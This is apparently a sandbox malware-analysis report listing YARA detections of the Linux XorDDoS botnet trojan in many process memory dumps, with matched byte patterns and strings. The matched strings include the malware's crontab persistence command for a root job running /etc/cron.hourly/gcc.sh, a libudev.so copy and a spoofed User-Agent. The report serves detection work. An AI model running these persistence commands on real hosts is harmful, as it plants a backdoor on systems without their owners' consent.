6303.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6364.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6364.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6364.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6364.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6364.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6364.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6364.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6266.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6266.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6266.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6266.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6266.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6266.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6266.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6356.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6356.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6356.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6356.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6356.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6356.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6356.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6491.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6491.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6491.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6491.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6491.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6491.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6491.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6381.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6381.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6381.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6381.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6381.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6381.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6381.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6409.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6409.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6409.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6409.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6409.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6409.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6409.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6546.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6546.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6546.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6546.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6546.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6546.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6546.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6493.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6493.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6493.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6493.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6493.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6493.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6493.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6306.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6306.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6306.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6306.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6306.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6306.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6306.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6421.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6421.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6421.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6421.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6421.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6421.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6421.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6389.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6389.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6389.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6389.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6389.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6389.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6389.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6452.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6452.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6452.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6452.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6452.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6452.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6452.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6310.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6310.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6310.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6310.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6310.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6310.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6310.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6351.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6351.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6351.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6351.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6351.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6351.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
